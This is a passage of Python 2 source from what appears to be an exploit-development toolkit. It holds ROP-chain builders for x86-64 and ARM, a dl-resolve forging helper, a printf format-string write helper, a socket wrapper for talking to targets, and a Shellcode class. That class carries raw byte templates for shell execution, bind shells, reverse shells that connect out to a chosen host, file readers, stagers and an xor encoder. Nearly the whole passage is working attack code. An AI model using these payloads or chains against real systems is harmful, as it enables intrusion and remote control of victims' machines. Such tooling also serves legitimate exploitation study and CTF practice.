                chunk2 = prefix + '\x8f' + chr(0xc0+r) + '\xc3'
                return self.search(regexp_or(chunk1, chunk2), xonly=True)
            else:
                # skip rsp
                return self.search(re.compile(r"(?:[\x58-\x5b\x5d-\x5f]|\x8f[\xc0-\xc3\xc5-\xc7]|\x41(?:[\x58-\x5f]|\x8f[\xc0-\xc7])){%d}\xc3" % n), xonly=True)
        elif keyword == 'call':
            prefix = '\x41' if need_prefix else ''
            chunk = prefix + '\xff' + chr(0xd0+r)  # call REG
            return self.search(chunk, xonly=True)
        elif keyword == 'jmp':
            prefix = '\x41' if need_prefix else ''
            chunk = prefix + '\xff' + chr(0xe0+r)  # jmp REG
            return self.search(chunk, xonly=True)
        elif keyword == 'jmp_ptr':
            prefix = '\x41' if need_prefix else ''
            chunk = prefix + '\xff' + chr(0x20+r)  # jmp [REG]
            return self.search(chunk, xonly=True)
        elif keyword == 'push':
            prefix = '\x41' if need_prefix else ''
            chunk1 = prefix + chr(0x50+r) + '\xc3'
            chunk2 = prefix + '\xff' + chr(0xf0+r) + '\xc3'
            return self.search(regexp_or(chunk1, chunk2), xonly=True)
        elif keyword == 'pivot':
            # chunk1: xchg REG, rsp
            # chunk2: xchg rsp, REG
            if need_prefix:
                chunk1 = '\x49\x87' + chr(0xe0+r) + '\xc3'
                chunk2 = '\x4c\x87' + chr(0xc4+8*r) + '\xc3'
            else:
                if r == 0:
                    # xchg rax, rsp has a one-byte short form
                    chunk1 = '\x48\x94\xc3'
                else:
                    chunk1 = '\x48\x87' + chr(0xe0+r) + '\xc3'
                chunk2 = '\x48\x87' + chr(0xc4+8*r) + '\xc3'
            return self.search(regexp_or(chunk1, chunk2), xonly=True)
        elif keyword == 'loop':
            chunk1 = '\xeb\xfe'              # jmp $ (2-byte)
            chunk2 = '\xe9\xfb\xff\xff\xff'  # jmp $ (5-byte)
            return self.search(regexp_or(chunk1, chunk2), xonly=True)
        else:
            # search directly
            return ROP.gadget(self, keyword)
    def call(self, addr, *args):
        """Chain fragment calling addr(*args) per the SysV x86-64 ABI
        (first six args in rdi, rsi, rdx, rcx, r8, r9)."""
        if isinstance(addr, str):
            addr = self.plt(addr)
        regs = ['rdi', 'rsi', 'rdx', 'rcx', 'r8', 'r9']
        buf = ''
        # NOTE(review): more than six args raises IndexError here before
        # the args[6:] stack-passing below is reached -- verify intent.
        for i, arg in enumerate(args):
            buf += self.p([self.gadget('pop', regs[i]), arg])
        buf += self.p(addr)
        buf += self.p(args[6:])
        return buf
    def call_chain_ptr(self, *calls, **kwargs):
        """Chain several calls through the __libc_csu_init gadget pair.

        Each element of `calls` is a list [got_name_or_ptr, arg1, ...]
        (max 3 args, first arg < 2^32).  kwargs['pivot'] optionally
        pivots the stack afterwards via leave;ret.
        """
        # (setter-gadget bytes, caller-gadget prefix bytes, args reversed?)
        # per known compiler versions of __libc_csu_init.
        gadget_candidates = [
            # gcc (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3
            # Ubuntu clang version 3.0-6ubuntu3 (tags/RELEASE_30/final) (based on LLVM 3.0)
            ('\x4c\x89\xfa\x4c\x89\xf6\x44\x89\xef\x41\xff\x14\xdc\x48\x83\xc3\x01\x48\x39\xeb\x75\xea', '\x48\x8b\x5c\x24\x08\x48\x8b\x6c\x24\x10\x4c\x8b\x64\x24\x18\x4c\x8b\x6c\x24\x20\x4c\x8b\x74\x24\x28\x4c\x8b\x7c\x24\x30\x48\x83\xc4\x38\xc3', False),
            # gcc (GCC) 4.4.7 20120313 (Red Hat 4.4.7-4)
            ('\x4c\x89\xfa\x4c\x89\xf6\x44\x89\xef\x41\xff\x14\xdc\x48\x83\xc3\x01\x48\x39\xeb\x72\xea', '\x48\x8b\x5c\x24\x08\x48\x8b\x6c\x24\x10\x4c\x8b\x64\x24\x18\x4c\x8b\x6c\x24\x20\x4c\x8b\x74\x24\x28\x4c\x8b\x7c\x24\x30\x48\x83\xc4\x38\xc3', False),
            # gcc 4.8.2-19ubuntu1
            ('\x4c\x89\xea\x4c\x89\xf6\x44\x89\xff\x41\xff\x14\xdc\x48\x83\xc3\x01\x48\x39\xeb\x75\xea', '\x48\x8b\x5c\x24\x08\x48\x8b\x6c\x24\x10\x4c\x8b\x64\x24\x18\x4c\x8b\x6c\x24\x20\x4c\x8b\x74\x24\x28\x4c\x8b\x74\x24\x28\x4c\x8b\x7c\x24\x30\x48\x83\xc4\x38\xc3', True),
            # gcc (Ubuntu 4.8.2-19ubuntu1) 4.8.2
            ('\x4c\x89\xea\x4c\x89\xf6\x44\x89\xff\x41\xff\x14\xdc\x48\x83\xc3\x01\x48\x39\xeb\x75\xea', '\x48\x83\xc4\x08\x5b\x5d\x41\x5c\x41\x5d\x41\x5e\x41\x5f\xc3', True),
        ]
        for chunk1, chunk2, _args_reversed in gadget_candidates:
            try:
                set_regs = self.gadget(chunk2)
                call_ptr = self.gadget(chunk1 + chunk2)
                args_reversed = _args_reversed
                break
            except ValueError:
                pass
        else:
            raise Exception('gadget not found')
        buf = self.p(set_regs)
        for args in calls:
            if len(args) > 4:
                raise Exception('4th argument and latter should be set in advance')
            elif args[1] >= (1<<32):
                raise Exception("1st argument should be less than 2^32: %x" % args[1])
            ptr = args.pop(0)
            if isinstance(ptr, str):
                ptr = self.got(ptr)
            buf += self.junk()
            # rbx=0, rbp=1 (loop counter check), r12=call target pointer
            buf += self.p([0, 1, ptr])
            if not args_reversed:
                for arg in args:
                    buf += self.p(arg)
                buf += self.p(0) * (3-len(args))
            else:
                buf += self.p(0) * (3-len(args))
                for arg in reversed(args):
                    buf += self.p(arg)
            buf += self.p(call_ptr)
            buf += self.junk()
            if 'pivot' in kwargs:
                buf += self.p(0)
                buf += self.p(kwargs['pivot'] - self.wordsize)
                buf += self.p(0) * 4
                buf += self.p(self.gadget('leave'))
            else:
                buf += self.p(0) * 6
        return buf
    def dl_resolve_data(self, base, name):
        """Forge the Elf64_Rela / Elf64_Sym / symbol-string blob for a
        dl-resolve attack, laid out as if written at address `base`."""
        jmprel = self.dynamic('JMPREL')
        relaent = self.dynamic('RELAENT')
        symtab = self.dynamic('SYMTAB')
        syment = self.dynamic('SYMENT')
        strtab = self.dynamic('STRTAB')
        addr_reloc, padlen_reloc = self.align(base, jmprel, relaent)
        addr_sym, padlen_sym = self.align(addr_reloc+relaent, symtab, syment)
        addr_symstr = addr_sym + syment
        # Python 2 integer division; symbol index in the high 32 bits,
        # type 0x7 (R_X86_64_JUMP_SLOT) in the low word.
        r_info = (((addr_sym - symtab) / syment) << 32) | 0x7
        st_name = addr_symstr - strtab
        buf = self.fill(padlen_reloc)
        buf += struct.pack('<QQQ', base, r_info, 0)  # Elf64_Rela
        buf += self.fill(padlen_sym)
        buf += struct.pack('<IIQQ', st_name, 0x12, 0, 0)  # Elf64_Sym
        buf += self.string(name)
        return buf
    def dl_resolve_call(self, base, *args):
        """Chain fragment entering PLT0 with a forged relocation *index*
        (x86-64 uses an entry index, not a byte offset)."""
        # prerequisite:
        # 1) overwrite (link_map + 0x1c8) with NULL
        # 2) set registers for arguments
        if args:
            raise Exception('arguments must be set to the registers beforehand')
        jmprel = self.dynamic('JMPREL')
        relaent = self.dynamic('RELAENT')
        addr_reloc, padlen_reloc = self.align(base, jmprel, relaent)
        # Python 2 integer division.
        reloc_offset = (addr_reloc - jmprel) / relaent
        buf = self.p(self.plt())
        buf += self.p(reloc_offset)
        return buf
    def syscall(self, number, *args):
        """Chain fragment invoking `syscall` number with args in
        rdi, rsi, rdx, r10, r8, r9 (kernel convention)."""
        arg_regs = ['rdi', 'rsi', 'rdx', 'r10', 'r8', 'r9']
        buf = self.p([self.gadget('pop', 'rax'), number])
        for arg_reg, arg in zip(arg_regs, args):
            buf += self.p([self.gadget('pop', arg_reg), arg])
        buf += self.p(self.gadget('syscall'))
        return buf
    def pivot(self, rsp):
        """Stack-pivot to `rsp` via pop rbp + leave;ret."""
        buf = self.p([self.gadget('pop', 'rbp'), rsp-self.wordsize])
        buf += self.p(self.gadget('leave'))
        return buf
    def retfill(self, size, buf=''):
        """Padding of `size - len(buf)` bytes made of ret-gadget addresses."""
        buflen = size - len(buf)
        assert buflen >= 0, "%d bytes over" % (-buflen,)
        s = self.fill(buflen % self.wordsize)
        s += self.p(self.gadget('ret')) * (buflen // self.wordsize)
        return s
    def list_gadgets(self):
        """Print an availability matrix of tiny gadgets (ANSI-colored,
        Python 2 print statements)."""
        print "%8s" % 'pop',
        for i in range(6):
            try:
                self.gadget('pop', n=i+1)
                print "\033[32m%d\033[m" % (i+1),
            except ValueError:
                print "\033[31m%d\033[m" % (i+1),
        print
        for keyword in ['pop', 'jmp', 'jmp_ptr', 'call', 'push', 'pivot']:
            print "%8s" % keyword,
            for reg in self.regs:
                try:
                    self.gadget(keyword, reg)
                    print "\033[32m%s\033[m" % reg,
                except ValueError:
                    print "\033[31m%s\033[m" % reg,
            print
        print "%8s" % 'etc',
        for keyword in ['leave', 'ret', 'int3', 'int80', 'call_gs10', 'syscall', 'loop']:
            try:
                self.gadget(keyword)
                print "\033[32m%s\033[m" % keyword,
            except ValueError:
                print "\033[31m%s\033[m" % keyword,
        print
class ROP_ARM(ROP):
    """ROP-chain builder for ARM (Thumb-mode gadgets)."""
    def pt(self, x):
        """Pack an address with the Thumb bit (bit 0) set; accepts a
        symbol string (resolved via self()) or an address."""
        if isinstance(x, str):
            return (self(x) | 1)
        else:
            return self.p(x | 1)
    def gadget(self, keyword, reg=None, n=1):
        """Look up a fixed Thumb/ARM gadget byte sequence, else defer to
        the generic keyword search."""
        table = {
            'pivot_r7': '\xbd\x46\x80\xbd',  # mov sp, r7; pop {r7, pc}
            'pivot_fp': '\x0b\xd0\xa0\xe1\x00\x88\xbd\xe8',  # mov sp, fp; pop {fp, pc}
            'pop_r0_3fp': '\xbd\xe8\x0f\x88',  # ldmia.w sp!, {r0, r1, r2, r3, fp, pc}
            'pop_r4_7': '\xf0\xbd',  # pop {r4, r5, r6, r7, pc}
            'svc0': '\x00\xdf',  # svc 0
        }
        if keyword in table:
            return self.search(table[keyword], xonly=True)
        # search directly
        return ROP.gadget(self, keyword)
    def call_chain(self, *calls, **kwargs):
        """Chain several calls through known __libc_csu_init-style ARM
        gadget pairs; layouts differ between gcc 4.6 and 4.8."""
        gadget_candidates = [
            # gcc (Ubuntu/Linaro 4.6.3-1ubuntu5) 4.6.3
            ('\x30\x46\x39\x46\x42\x46\x01\x34\x98\x47\x4c\x45\xf6\xd1', '\xbd\xe8\xf8\x83', True),
            # gcc (Ubuntu/Linaro 4.8.2-19ubuntu1) 4.8.2
            ('\x38\x46\x41\x46\x4a\x46\x98\x47\xb4\x42\xf6\xd1', '\xbd\xe8\xf8\x83', False),
        ]
        for chunk1, chunk2, _is_4_6 in gadget_candidates:
            try:
                set_regs = self.gadget(chunk2)
                call_reg = self.gadget(chunk1 + chunk2)
                is_4_6 = _is_4_6
                break
            except ValueError:
                pass
        else:
            raise Exception('gadget not found')
        buf = self.pt(set_regs)
        for args in calls:
            if len(args) > 4:
                raise Exception('4th argument and latter should be set in advance')
            addr = args.pop(0)
            if isinstance(addr, str):
                addr = self.plt(addr)
            if is_4_6:
                # gcc 4.6 layout: extra loop-counter words around the args.
                buf += self.p(addr)
                buf += self.p([0, 0])
                for arg in args:
                    buf += self.p(arg)
                buf += self.p(0) * (3-len(args))
                buf += self.p(1)
                buf += self.pt(call_reg)
            else:
                buf += self.p(addr)
                buf += self.p([0, 0, 0])
                for arg in args:
                    buf += self.p(arg)
                buf += self.p(0) * (3-len(args))
                buf += self.pt(call_reg)
        if 'pivot' in kwargs:
            try:
                # Prefer the r7 pivot; pad registers popped before it.
                pivot_r7 = self.gadget('pivot_r7')
                buf += self.p(0) * 4
                buf += self.p(kwargs['pivot'] - self.wordsize)
                buf += self.p(0) * 2
                buf += self.pt(pivot_r7)
            except ValueError:
                buf += self.p(0) * 7
                buf += self.pivot(kwargs['pivot'])
        else:
            buf += self.p(0) * 7
        return buf
    def syscall(self, number, *args):
        """Chain fragment invoking `svc 0` with r0-r6 loaded from the
        stack via the two pop gadgets (r7 carries the syscall number)."""
        args0_3, args4_6 = args[:4], args[4:7]
        buf = self.pt(self.gadget('pop_r0_3fp'))
        for arg in args0_3:
            buf += self.p(arg)
        buf += self.p(0) * (4-len(args0_3))
        buf += self.p(0)  # fp slot
        buf += self.pt(self.gadget('pop_r4_7'))
        for arg in args4_6:
            buf += self.p(arg)
        buf += self.p(0) * (3-len(args4_6))
        buf += self.p(number)  # lands in r7
        buf += self.pt(self.gadget('svc0'))
        return buf
    def pivot(self, rsp):
        """Stack-pivot to `rsp` via the r7 (or fp) pivot gadget; the +2/+4
        entry points skip the mov so only the pop executes first."""
        try:
            addr = self.gadget('pivot_r7')
            return self.p([addr+2, rsp-self.wordsize, addr])
        except ValueError:
            addr = self.gadget('pivot_fp')
            return self.p([addr+4, rsp-self.wordsize, addr])
    def list_gadgets(self):
        """Print gadget availability (ANSI-colored, Python 2 prints)."""
        print "%8s" % 'pivot',
        for keyword in ['pivot_r7', 'pivot_fp']:
            try:
                self.gadget(keyword)
                print "\033[32m%s\033[m" % keyword,
            except ValueError:
                print "\033[31m%s\033[m" % keyword,
        print
        print "%8s" % 'syscall',
        for keyword in ['pop_r0_3fp', 'pop_r4_7', 'svc0']:
            try:
                self.gadget(keyword)
                print "\033[32m%s\033[m" % keyword,
            except ValueError:
                print "\033[31m%s\033[m" % keyword,
        print
class Shellcode(object):
    """Canned shellcode templates per architecture.

    Templates contain ${name} placeholders substituted by get(); helper
    methods wrap the common payloads (shell, dup, stagers, ...).
    """
    _database = {
        'i386': {
            'noppairs': ['AI', 'BJ', 'CK', 'FN', 'GO'],
            'exec_shell': '\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80',
            'exec_command': '\xeb\x29\x5e\x31\xc9\x8a\x0e\x46\x88\x2c\x0e\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe1\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x51\x53\x89\xe1\xcd\x80\xe8\xd2\xff\xff\xff',
            'dup': '\x31\xd2\x8d\x5a${fd}\x8d\x4a\x02\x8d\x42\x3f\xcd\x80\x49\x7d\xf8',
            'readfile': '\xeb\x2d\x5b\x31\xc9\x8a\x0b\x43\x88\x2c\x0b\x31\xc9\x8d\x41\x05\xcd\x80\x93\x91\x8d\x50\x01\xc1\xe2\x0c\x6a\x03\x58\xcd\x80\x92\x6a${fd}\x5b\x6a\x04\x58\xcd\x80\x31\xdb\x8d\x43\x01\xcd\x80\xe8\xce\xff\xff\xff',
            'readdir': '\xeb\x41\x5b\x31\xc9\x8a\x0b\x43\x88\x2c\x0b\x31\xff\x31\xc9\x8d\x47\x05\xcd\x80\x93\x91\x8d\x57\x01\x8d\x47\x59\x60\xcd\x80\x87\xce\x85\xc0\x74\x17\x66\x8b\x56\x08\x8d\x4e\x0a\xc6\x04\x11\x0a\x42\x8d\x5f${fd}\x8d\x47\x04\xcd\x80\x61\xeb\xe0\x31\xdb\x8d\x47\x01\xcd\x80\xe8\xba\xff\xff\xff',
            'read_stager': '\xeb\x0f\x59\x6a\x03\x58\x99\x89\xd3\x42\xc1\xe2\x0c\xcd\x80\xff\xe1\xe8\xec\xff\xff\xff',
            'mmap_stager': '\x6a\x5a\x58\x99\x89\xd1\x42\xc1\xe2\x0c\x51\x6a\xff\x6a\x22\x6a\x07\x52\x51\x89\xe3\xcd\x80\x91\x93\x8d\x43\x03\xcd\x80\xff\xe1',
            'alnum_stager': 'Yh3333k4dsFkDqG02DqH0D10u03P3H1o0j2B0207393s3q103a8P7l3j4s3B065k3O4N8N8O03',
            'bind_shell': '\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x66\x68${port}\x66\x6a\x02\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80',
            'reverse_shell': '\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68${host}\x66\x68${port}\x66\x6a\x02\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80',
            'xor': '\xeb\x0f\x5e\x80\x36${key}\x74\x0e\x46\xeb\xf8${key}${key}${key}${key}${key}${key}\xe8\xec\xff\xff\xff',
        },
        'x86-64': {
            'noppairs': ['PX', 'QY', 'RZ'],
            'exec_shell': '\x6a\x3b\x58\x48\x99\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x57\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05',
            'exec_command': '\xeb\x31\x5e\x48\x31\xc9\x8a\x0e\x48\xff\xc6\x88\x2c\x0e\x6a\x3b\x58\x48\x99\x52\x66\x68\x2d\x63\x48\x89\xe3\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x57\x48\x89\xe7\x52\x56\x53\x57\x48\x89\xe6\x0f\x05\xe8\xca\xff\xff\xff',
            'dup': '\x6a${fd}\x5f\x6a\x02\x5e\x6a\x21\x58\x0f\x05\x48\xff\xce\x7d\xf6',
            'readfile': '\xeb\x33\x5f\x48\x31\xc9\x8a\x0f\x48\xff\xc7\x88\x2c\x0f\x48\x31\xf6\x6a\x02\x58\x0f\x05\x48\x97\x48\x96\x6a\x01\x5a\x48\xc1\xe2\x0c\x0f\x05\x48\x92\x6a${fd}\x5f\x6a\x01\x58\x0f\x05\x48\x31\xff\x6a\x3c\x58\x0f\x05\xe8\xc8\xff\xff\xff',
            'readdir': '\xeb\x57\x5f\x48\x31\xc9\x8a\x0f\x48\xff\xc7\x88\x2c\x0f\x48\x31\xf6\x6a\x02\x58\x0f\x05\x48\x97\x48\x96\x48\x31\xd2\x66\xf7\xd2\x6a\x4e\x58\x0f\x05\x48\x8b\x06\x48\x85\xc0\x74\x24\x66\x8b\x56\x10\x4c\x8d\x04\x16\x48\x83\xea\x14\x48\x8d\x76\x12\xc6\x04\x16\x0a\x48\xff\xc2\x6a${fd}\x5f\x6a\x01\x58\x0f\x05\x4c\x89\xc6\xeb\xd4\x48\x31\xff\x6a\x3c\x58\x0f\x05\xe8\xa4\xff\xff\xff',
            'read_stager': '\xeb\x13\x5e\x48\x31\xff\x48\x8d\x57\x01\x48\xc1\xe2\x0c\x48\x31\xc0\x0f\x05\xff\xe6\xe8\xe8\xff\xff\xff',
            'mmap_stager': '\x4d\x31\xc9\x6a\xff\x41\x58\x6a\x22\x41\x5a\x6a\x07\x5a\x49\x8d\x71\x01\x48\xc1\xe6\x0c\x48\x31\xff\x6a\x09\x58\x0f\x05\x48\x96\x48\x92\x48\x31\xc0\x0f\x05\xff\xe6',
            'alnum_stager': 'h0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M367p0h1O0A8O7p5L2x01193i4m7k08144L7m1M3K043I3A8L4V8K0m',
            'bind_shell': '\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\xba\xf2\xff${port}\x66\x83\xf2\xf0\x52\x48\x89\xe6\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05',
            'reverse_shell': '\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x68${host}\x66\x68${port}\x66\x6a\x02\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05',
            'xor': '\xeb\x0f\x5e\x80\x36${key}\x74\x0e\x48\xff\xc6\xeb\xf6${key}${key}${key}${key}\xe8\xec\xff\xff\xff',
        },
        'arm': {
            'exec_shell': '\x01\x70\x8f\xe2\x17\xff\x2f\xe1\x04\xa7\x03\xcf\x52\x40\x07\xb4\x68\x46\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46\x2f\x62\x69\x6e\x2f\x2f\x73\x68',
        },
    }
    def __init__(self, arch):
        """arch: one of the _database keys ('i386', 'x86-64', 'arm')."""
        if arch not in self._database:
            # BUGFIX: message said "architechture".
            raise Exception("unsupported architecture: %r" % arch)
        self.arch = arch
    def get(self, name, **kwargs):
        """Return the named template with ${k} placeholders replaced by
        the given keyword values."""
        if name not in self._database[self.arch]:
            # BUGFIX: was `arch` (NameError) instead of `self.arch`.
            raise Exception("unsupported shellcode for %s architecture: %r" % (self.arch, name))
        sc = self._database[self.arch][name]
        # .items() works identically on Python 2 (was .iteritems()).
        for k, v in kwargs.items():
            sc = sc.replace("${%s}" % k, v)
        return sc
    def nopfill(self, code, size, buf=''):
        """Left-pad `code` with random executable nop-pairs so the result
        plus the already-present `buf` totals `size` bytes."""
        noppairs = self.get('noppairs')
        padlen = size - len(buf) - len(code)
        assert padlen >= 0, "%d bytes over" % (-padlen,)
        pad = ''
        while len(pad) < padlen:
            pad += random.choice(noppairs)
        return pad[:padlen] + code
    def exec_shell(self):
        """execve("/bin//sh") payload."""
        return self.get('exec_shell')
    def exec_command(self, command):
        """sh -c COMMAND payload; command length is a single prefix byte."""
        return self.get('exec_command') + chr(len(command)) + command
    def dup(self, code, fd):
        """Prefix `code` with a stub dup2-ing fd to stdin/stdout/stderr."""
        return self.get('dup', fd=chr(fd)) + code
    def readfile(self, path, fd=1):
        """Payload dumping `path` to descriptor `fd` (default stdout)."""
        return self.get('readfile', fd=chr(fd)) + chr(len(path)) + path
    def readdir(self, path, fd=1):
        """Payload listing directory `path` to descriptor `fd`."""
        return self.get('readdir', fd=chr(fd)) + chr(len(path)) + path
    def read_stager(self):
        """Stager reading second-stage code from stdin."""
        return self.get('read_stager')
    def mmap_stager(self):
        """Stager mmap-ing an RWX page and reading stage two into it."""
        return self.get('mmap_stager')
    def alnum_stager(self, reg):
        """Alphanumeric stager prefixed with `push REG`, where REG holds
        the address of the stager itself (popped right back by the
        decoder's leading pop)."""
        # BUGFIX: the register tables previously listed esi/edi (rsi/rdi)
        # twice in place of esp/ebp (rsp/rbp), so e.g. 'esi' encoded as
        # push esp (0x54) instead of push esi (0x56).  Tables now follow
        # the hardware encoding order, which also makes esp/ebp legal.
        if self.arch == 'i386':
            r = ['eax', 'ecx', 'edx', 'ebx', 'esp', 'ebp', 'esi', 'edi'].index(reg)
            return chr(0x50+r) + self.get('alnum_stager')
        elif self.arch == 'x86-64':
            r = ['rax', 'rcx', 'rdx', 'rbx', 'rsp', 'rbp', 'rsi', 'rdi', 'r8', 'r9', 'r10', 'r11', 'r12', 'r13', 'r14', 'r15'].index(reg)
            if r >= 8:
                return '\x41' + chr(0x50+(r-8)) + self.get('alnum_stager')
            else:
                return chr(0x50+r) + self.get('alnum_stager')
        else:
            raise Exception("unsupported architecture: %r" % self.arch)
    def bind_shell(self, port):
        """Bind-shell payload listening on `port` (big-endian u16)."""
        p = struct.pack('>H', port)
        return self.get('bind_shell', port=p)
    def reverse_shell(self, host, port):
        """Reverse-shell payload connecting back to host:port."""
        addrinfo = socket.getaddrinfo(host, port, socket.AF_INET, socket.SOCK_STREAM)
        h, p = addrinfo[0][4]
        h = socket.inet_aton(h)
        p = struct.pack('>H', p)
        return self.get('reverse_shell', host=h, port=p)
    def xor(self, code, badchars='\x00\t\n\v\f\r '):
        """Wrap `code` in a single-byte xor decoder, choosing a key whose
        encoded output avoids `badchars`; raises if no key works."""
        # range() iterates identically on Python 2 (was xrange()).
        for key in range(0x100):
            decoder = self.get('xor', key=chr(key))
            encoded_code = str(bytearray(c^key for c in bytearray(code)))
            result = decoder + encoded_code + chr(key)
            if all(c not in result for c in badchars):
                return result
        else:
            raise Exception('xor key not found')
class FormatStr(object):
    """printf format-string exploitation helper (i386, 32-bit pointers)."""
    def __init__(self, offset=0):
        # i386 only
        # offset: positional parameter index of the attacker-controlled
        # buffer on the stack (find it with dump_stack()/calc_offset()).
        self.offset = offset
    def dump_stack(self, size, start=None):
        """Build a payload of exactly `size` bytes that leaks stack words.

        With `start` given (> 1), uses explicit positional conversions
        %N$x from that index; otherwise repeats plain '.%x'.
        """
        buf = 'AAAA'
        # BUGFIX: guard with `is not None` -- the default start=None made
        # `start > 1` a TypeError on Python 3 (it was silently False on
        # Python 2); behavior for all int values is unchanged.
        if start is not None and start > 1:
            i = start
            while len(buf) < size:
                buf += ".%%%d$x" % i
                i += 1
        else:
            while len(buf) < size:
                buf += '.%x'
        return buf[:size]
    def calc_offset(self, s):
        """Given the echoed output of dump_stack(), return the positional
        index of the 'AAAA' marker (hex 41414141)."""
        return s.split('.').index('41414141')
    def gets(self, addr):
        """Payload that leaks the NUL-terminated string at `addr` via %s."""
        buf = p32(addr)
        buf += "%%%d$s" % self.offset
        return buf
    def write4(self, addr, value):
        """Payload writing 32-bit `value` to `addr` byte/word-wise with
        %hhn/%hn so individual pad counts stay small."""
        if addr % 0x10 == 0x8:
            # addr+2 would end in 0x0a (newline); write a 16-bit chunk at
            # addr+1 instead so the payload never contains '\x0a'.
            buf = p32([addr, addr+1, addr+3])
            n = [value & 0xFF, (value >> 8) & 0xFFFF, (value >> 24) & 0xFF]
            # Convert absolute byte values into incremental pad counts
            # (each %Nc advances printf's output counter).
            n[2] = ((n[2]-n[1]-1) % 0x100) + 1
            n[1] = ((n[1]-n[0]-1) % 0x10000) + 1
            n[0] = ((n[0]-len(buf)-1) % 0x100) + 1
            buf += "%%%dc%%%d$hhn" % (n[0], self.offset)
            buf += "%%%dc%%%d$hn" % (n[1], self.offset+1)
            buf += "%%%dc%%%d$hhn" % (n[2], self.offset+2)
        else:
            buf = p32([addr, addr+1, addr+2, addr+3])
            # BUGFIX: wrap map() in list() -- Python 3's map object does
            # not support the item assignments below (Python 2 already
            # returned a list, so behavior is unchanged there).
            n = list(map(ord, p32(value)))
            n[3] = ((n[3]-n[2]-1) % 0x100) + 1
            n[2] = ((n[2]-n[1]-1) % 0x100) + 1
            n[1] = ((n[1]-n[0]-1) % 0x100) + 1
            n[0] = ((n[0]-len(buf)-1) % 0x100) + 1
            buf += "%%%dc%%%d$hhn" % (n[0], self.offset)
            buf += "%%%dc%%%d$hhn" % (n[1], self.offset+1)
            buf += "%%%dc%%%d$hhn" % (n[2], self.offset+2)
            buf += "%%%dc%%%d$hhn" % (n[3], self.offset+3)
        return buf
class Proc(object):
    """Socket-backed handle to a target: either a remote host:port or a
    local command whose stdio is bridged through a socketpair-like setup.
    """
    def __init__(self, *args, **kwargs):
        # timeout: per-read select timeout; display: echo traffic in
        # color; debug: pause after spawn so a debugger can attach.
        self.timeout = kwargs.get('timeout', 0.1)
        self.display = kwargs.get('display', False)
        self.debug = kwargs.get('debug', False)
        if 'host' in kwargs and 'port' in kwargs:
            self.s = socket.create_connection((kwargs['host'], kwargs['port']))
        else:
            self.s = self.connect_process(args)
        self.s.setblocking(0)
    def connect_process(self, cmd):
        """Spawn `cmd` with its stdio bound to an accepted TCP connection
        on a loopback listener; return the client end of that connection."""
        def run_server(s, e, cmd):
            c, addr = s.accept()
            s.close()
            try:
                # setsid detaches the child from our controlling terminal.
                p = Popen(cmd, stdin=c, stdout=c, stderr=c, preexec_fn=lambda: os.setsid())
            except Exception as err:
                c.close()
                e.set()
                raise err
            if self.debug:
                raw_input("\x1b[32mpid %d is running, attach the debugger if needed. Hit enter key to continue...\x1b[0m" % p.pid)
            e.set()
            p.wait()
            c.close()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        s.bind(('', 0))  # INADDR_ANY, INPORT_ANY
        s.listen(1)
        e = Event()
        t = Thread(target=run_server, args=(s, e, cmd))
        t.daemon = True
        t.start()
        c = socket.create_connection(s.getsockname())
        # Wait until the child is actually launched (or failed).
        e.wait()
        return c
    def write(self, s):
        """Send all of `s`; optionally echo it (yellow) when display=True."""
        select.select([], [self.s], [])
        self.s.sendall(s)
        if self.display:
            printable = re.sub(r'[^\s\x20-\x7e]', '.', s)
            sys.stdout.write("\x1b[33m%s\x1b[0m" % printable)  # yellow
            sys.stdout.flush()
    def read(self, size=-1, timeout=-1):
        """Read up to `size` bytes (or until the timeout fires / peer
        closes).  size < 0 drains whatever is currently available."""
        if size < 0:
            chunk_size = 8192
            buf = ''
            while True:
                chunk = self.read(chunk_size, timeout)
                buf += chunk
                if len(chunk) < chunk_size:
                    break
            return buf
        if timeout < 0:
            timeout = self.timeout
        buf = ''
        while len(buf) < size:
            rlist, wlist, xlist = select.select([self.s], [], [], timeout)
            if not rlist:
                break
            chunk = self.s.recv(size-len(buf))
            if not chunk:
                break
